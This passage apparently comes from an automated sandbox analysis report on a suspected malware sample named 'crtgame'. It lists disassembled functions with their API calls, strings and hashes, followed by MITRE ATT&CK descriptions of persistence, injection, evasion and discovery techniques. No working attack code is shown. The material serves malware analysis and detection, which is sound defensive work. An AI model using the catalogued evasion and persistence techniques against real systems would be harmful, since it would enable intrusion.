Instruction ID: 74d81a120d181cb75b4fefee1014399561d1b75899c336730ba1c55b0253ca06
Opcode Fuzzy Hash: e5e277de811cf135e1279240513c5cd8d0c03bfe673b12dfe0c5c9483fcc0aca
Instruction Fuzzy Hash: 7D11CE71601314ABDB209F60CA84BABBBB8FF50704F1044ADFA019A140DBB1FA49CBE1

Function 02C3C25B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 02C3C27F

Part of subcall function 02C3C966: __fltout2.LIBCMT ref: 02C3C98F

__cftog_l.LIBCMT ref: 02C3C2A5
__cftoe_l.LIBCMT ref: 02C3C2D7

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 3a58d4ec9950d7b2b0e97018edc3fb1f984fac3f849c69325f9466e78e685e4d
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: AE01083604014ABBCF136ED8CC458EE3F66BB59754B498816FA28A9131D737C6B1AB81

Function 02C2247D Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C224A9
RtlEnterCriticalSection.NTDLL(?), ref: 02C224B8
InterlockedExchange.KERNEL32(?,00000001), ref: 02C224CD
RtlLeaveCriticalSection.NTDLL(?), ref: 02C224D4

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
String ID:
API String ID: 4018804020-0
Opcode ID: 6fbe5d34d1ccb4e84365d70e99e127b3df6e19a0de5c5ae8ace1bc6d5da4963a
Instruction ID: 20079598d806430e6869a21e49d99297db61bcf7dede0241b2aeb570d661c955
Opcode Fuzzy Hash: 6fbe5d34d1ccb4e84365d70e99e127b3df6e19a0de5c5ae8ace1bc6d5da4963a
Instruction Fuzzy Hash: D7F03C76641215AFDB009FA5E884B9BBBACFF54710F008559FA04C6141D771E668CFE1

Function 02C22004 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C22009
RtlDeleteCriticalSection.NTDLL(?), ref: 02C22028
CloseHandle.KERNEL32(00000000), ref: 02C22037
CloseHandle.KERNEL32(00000000), ref: 02C2204E

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseHandle$CriticalDeleteH_prologSection
String ID:
API String ID: 2456309408-0
Opcode ID: fb0ceeccb6bc019126117f67f4c26b94aff6cce9b424cfddd9db69e3983888d7
Instruction ID: dd3573ea6b32e3a3c5cb9a341259e6ae011f66b5fb7bd08cdd28aa090c7083a7
Opcode Fuzzy Hash: fb0ceeccb6bc019126117f67f4c26b94aff6cce9b424cfddd9db69e3983888d7
Instruction Fuzzy Hash: 5A01A9718007208FC739AF64E908BABFBF5EF08709F004A1DE84692590CB70A64CDF91

Function 02C21E26 Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C21E2B
SetEvent.KERNEL32(00000000), ref: 02C21E3F
SetEvent.KERNEL32(?), ref: 02C21E58
SleepEx.KERNEL32(000000FF,00000001), ref: 02C21E62

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Event$H_prologSleep
String ID:
API String ID: 1765829285-0
Opcode ID: 34343df4b41348d5ff3ae6ce59df3a8da7a08df31150ce78c1ade24de5ce2b94
Instruction ID: aa761c23029fcb7fc8ece9dd83108dd1912863bcc67247ad7e3ceba72d77d6e1
Opcode Fuzzy Hash: 34343df4b41348d5ff3ae6ce59df3a8da7a08df31150ce78c1ade24de5ce2b94
Instruction Fuzzy Hash: 3CF05475A41110DFCB109FA4D8C8B8EFBA5FF0D311F1082A9F619DB290CB359854CB91

Function 02C29008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02C27D72,?,?,00000000), ref: 02C2906F
getsockname.WS2_32(?,?,?), ref: 02C29085

Strings

&', xrefs: 02C290B8

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLastgetsockname
String ID: &'
API String ID: 566540725-655172784
Opcode ID: c5aad58c29924d08a8c0b983e2ba59f7477c700a532edaf67a5ac0f67529aa9e
Instruction ID: 6d86d69684b253526720ef0d09a271f5cf63de09e54dc697928ebf55abf7c814
Opcode Fuzzy Hash: c5aad58c29924d08a8c0b983e2ba59f7477c700a532edaf67a5ac0f67529aa9e
Instruction Fuzzy Hash: 8D215176A00258DBDB10DF78D844ACEB7F5FF4C314F20856AE918EB280EB30E9458B94

Function 02C2C64E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C2C653

Part of subcall function 02C2CC2F: std::exception::exception.LIBCMT ref: 02C2CC5E

Part of subcall function 02C2D3E5: __EH_prolog.LIBCMT ref: 02C2D3EA

Part of subcall function 02C3356D: _malloc.LIBCMT ref: 02C33585

Part of subcall function 02C2CC8E: __EH_prolog.LIBCMT ref: 02C2CC93

Strings

class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02C2C689
C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C2C690

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$_mallocstd::exception::exception
String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
API String ID: 1953324306-1943798000
Opcode ID: b1f26ba802bcfe648ef62a87a81b86141eb044fd700c1b07c18cc1c8e9785c2d
Instruction ID: 4c42042f81936f0207b065869c2bf3bda432a155119c53f59fbebb80a9506c09
Opcode Fuzzy Hash: b1f26ba802bcfe648ef62a87a81b86141eb044fd700c1b07c18cc1c8e9785c2d
Instruction Fuzzy Hash: 8A21B1B1E002689BDB04EFE4D944BEEBBB5EF54704F00455EE806AB280DF749A48DF91

Function 02C2C743 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C2C748

Part of subcall function 02C2CD06: std::exception::exception.LIBCMT ref: 02C2CD33

Part of subcall function 02C2D51C: __EH_prolog.LIBCMT ref: 02C2D521

Part of subcall function 02C3356D: _malloc.LIBCMT ref: 02C33585

Part of subcall function 02C2CD63: __EH_prolog.LIBCMT ref: 02C2CD68

Strings

C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C2C785
class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02C2C77E

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$_mallocstd::exception::exception
String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
API String ID: 1953324306-412195191
Opcode ID: 38b496e7e2ca2942586e9559241a06869390152918339054c62837f7b2258a86
Instruction ID: 21e443873f2a136ce576da4f7022a7a98de9ef33defb646088389e993c00bdff
Opcode Fuzzy Hash: 38b496e7e2ca2942586e9559241a06869390152918339054c62837f7b2258a86
Instruction Fuzzy Hash: 9C2180B1E002649BDB14EFA4D854BAEBBB9EF54704F00455EE806AB280DF749A48DF90

Function 02C25278 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02C25288

Part of subcall function 02C329CC: __FF_MSGBANNER.LIBCMT ref: 02C329E3
Part of subcall function 02C329CC: __NMSG_WRITE.LIBCMT ref: 02C329EA
Part of subcall function 02C329CC: RtlAllocateHeap.NTDLL(00990000,00000000,00000001), ref: 02C32A0F

SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02C275C8), ref: 02C2529A

Strings

\save.dat, xrefs: 02C252AE

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: AllocateFolderHeapPathSpecial_malloc
String ID: \save.dat
API String ID: 4128168839-3580179773
Opcode ID: a65794d8f55fe67e88daa1392b523614a4b38be63979f0ea52133b8c00a651d5
Instruction ID: 52e7f60cfd1b695b943e04733d89a0b9e01550a2c20c57287bf1e71df289c0c6
Opcode Fuzzy Hash: a65794d8f55fe67e88daa1392b523614a4b38be63979f0ea52133b8c00a651d5
Instruction Fuzzy Hash: 0A1190329042552BDB269E64CC80E6FFF67DFC26A0B5046ECE84967142DE731E06C6E0

Function 02C23965 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C2396A
std::runtime_error::runtime_error.LIBCPMT ref: 02C239C1

Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428

Part of subcall function 02C29FBD: __EH_prolog.LIBCMT ref: 02C29FC2
Part of subcall function 02C29FBD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C29FD1
Part of subcall function 02C29FBD: __CxxThrowException@8.LIBCMT ref: 02C29FF0

Strings

Day of month is not valid for year, xrefs: 02C239AC

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
String ID: Day of month is not valid for year
API String ID: 1404951899-1521898139
Opcode ID: 915076f651f27c9df109bec185bfe3baa0d93ff8801f20d287f43245f5eb9637
Instruction ID: ad1e9c21ad78b1b8769d4272ba1118a63cf7de8ad722a01688c784590077b229
Opcode Fuzzy Hash: 915076f651f27c9df109bec185bfe3baa0d93ff8801f20d287f43245f5eb9637
Instruction Fuzzy Hash: D101B17A914219AADB04EFA4D845AEFB779FF18710F10401BEC04A3210EF705A49DB95

Function 02C2AA9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 02C2F523
__CxxThrowException@8.LIBCMT ref: 02C2F538

Part of subcall function 02C3356D: _malloc.LIBCMT ref: 02C33585

Strings

bad allocation, xrefs: 02C2F518

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: bad allocation
API String ID: 4063778783-2104205924
Opcode ID: 1fa85a20eaa46984b41b97a65411df5cc247bed8ef6625210cc05af66e2fa76f
Instruction ID: 2ea8e1b2e41833cac5ae11400298736569b55289444b906f63dcd2871a4fc694
Opcode Fuzzy Hash: 1fa85a20eaa46984b41b97a65411df5cc247bed8ef6625210cc05af66e2fa76f
Instruction Fuzzy Hash: A7F0AEB064431DE6EF04E6A889159AF73FD9F04714B4409A9E511D31C1EF71E70849D4

Function 02C23C16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C23C1B
std::bad_exception::bad_exception.LIBCMT ref: 02C23C30

Part of subcall function 02C31ED7: std::exception::exception.LIBCMT ref: 02C31EE1

Part of subcall function 02C29FF6: __EH_prolog.LIBCMT ref: 02C29FFB
Part of subcall function 02C29FF6: __CxxThrowException@8.LIBCMT ref: 02C2A024

Strings

bad cast, xrefs: 02C23C28

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 1300498068-3145022300
Opcode ID: 674287906aa69aec01e115546f7801025d7ec1e7045a3530eae6e2ef4305f6b4
Instruction ID: 507475297ec2e793f72894d9d883298d47faf22719cf11b9c9c87c324c4db14a
Opcode Fuzzy Hash: 674287906aa69aec01e115546f7801025d7ec1e7045a3530eae6e2ef4305f6b4
Instruction Fuzzy Hash: C3F0A7729005488BC719DF58D4406DBB776FF51315F10416EED0657240CFB29A4BDA91

Function 02C238CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C238D2
std::runtime_error::runtime_error.LIBCPMT ref: 02C238F1

Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428

Strings

Year is out of valid range: 1400..10000, xrefs: 02C238E0

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
String ID: Year is out of valid range: 1400..10000
API String ID: 2067857976-2344417016
Opcode ID: 22bad19704a7051cfa69d440f1f1c27a91550dd9f609b8accf4a851206f8ead7
Instruction ID: e1c23b9075211a912196b5881e788217c1017da6a71fbf9354b98d58278992e3
Opcode Fuzzy Hash: 22bad19704a7051cfa69d440f1f1c27a91550dd9f609b8accf4a851206f8ead7
Instruction Fuzzy Hash: BFE0D872E0021497DB28FB989C55BDFB779EB08710F04015EE80663280DEB12948DB91

Function 02C23881 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C23886
std::runtime_error::runtime_error.LIBCPMT ref: 02C238A5

Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428

Strings

Day of month value is out of range 1..31, xrefs: 02C23894

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
String ID: Day of month value is out of range 1..31
API String ID: 2067857976-1361117730
Opcode ID: 151aec502c4e8a9f20b9d99ff2d08f27368c1dddb4282dade62f0e5975f8c0e7
Instruction ID: abe9aa933d5d6fa67be85960744cd73d26aa4109f6dea472aa4bfc00c85f6b90
Opcode Fuzzy Hash: 151aec502c4e8a9f20b9d99ff2d08f27368c1dddb4282dade62f0e5975f8c0e7
Instruction Fuzzy Hash: 72E0D872E0021497D714FB989C55BDEB779EB08720F04055EE80673280DEB12948DB95

Function 02C23919 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C2391E
std::runtime_error::runtime_error.LIBCPMT ref: 02C2393D

Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428

Strings

Month number is out of range 1..12, xrefs: 02C2392C

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
String ID: Month number is out of range 1..12
API String ID: 2067857976-4198407886
Opcode ID: 0b3caa0afa1cae24e86d46992567fb8779cb3d8f058c1e49d067392c5ba019d4
Instruction ID: 80b5627d22e17c495413899f01fa2295b563e8f60dae18cacc5be34be7e1c770
Opcode Fuzzy Hash: 0b3caa0afa1cae24e86d46992567fb8779cb3d8f058c1e49d067392c5ba019d4
Instruction Fuzzy Hash: 8EE0D872F4022497D714FB989C55BEFB779EB08710F04415EE40663680DEB12948DBD1

Function 02C219C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 02C219CC
GetLastError.KERNEL32 ref: 02C219D9

Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717

Strings

tss, xrefs: 02C219E8

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: AllocErrorH_prologLast
String ID: tss
API String ID: 249634027-1638339373
Opcode ID: a3bdc56174d5463734ed38448943e511e39b0263793820ed925088bcf44a8f18
Instruction ID: 22ea1e2a8a13b4a033147e3e877eee58b618b495a54b9d1771003a04528dbf9c
Opcode Fuzzy Hash: a3bdc56174d5463734ed38448943e511e39b0263793820ed925088bcf44a8f18
Instruction Fuzzy Hash: 4CE08677D153245BC3107B78A80818BBBD49A84230F104B6AECAD832D0FF3199589FC6

Function 02C23BD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C23BD8
std::bad_exception::bad_exception.LIBCMT ref: 02C23BED

Part of subcall function 02C31ED7: std::exception::exception.LIBCMT ref: 02C31EE1

Part of subcall function 02C29FF6: __EH_prolog.LIBCMT ref: 02C29FFB
Part of subcall function 02C29FF6: __CxxThrowException@8.LIBCMT ref: 02C2A024

Strings

bad cast, xrefs: 02C23BE5

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 1300498068-3145022300
Opcode ID: d2f6881dab9e893d7fb8a95f75d0ef120b248c435db5e5af8a3a85a4ff2c070d
Instruction ID: d808ab7f1cc8a47f31c4d5a715cef680c99af2369815212f82114afba7d9c6f4
Opcode Fuzzy Hash: d2f6881dab9e893d7fb8a95f75d0ef120b248c435db5e5af8a3a85a4ff2c070d
Instruction Fuzzy Hash: 22E09A70A001489BC718EF54D541BAEB772EF10304F1080ACA90603280CF751A0ADE81

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

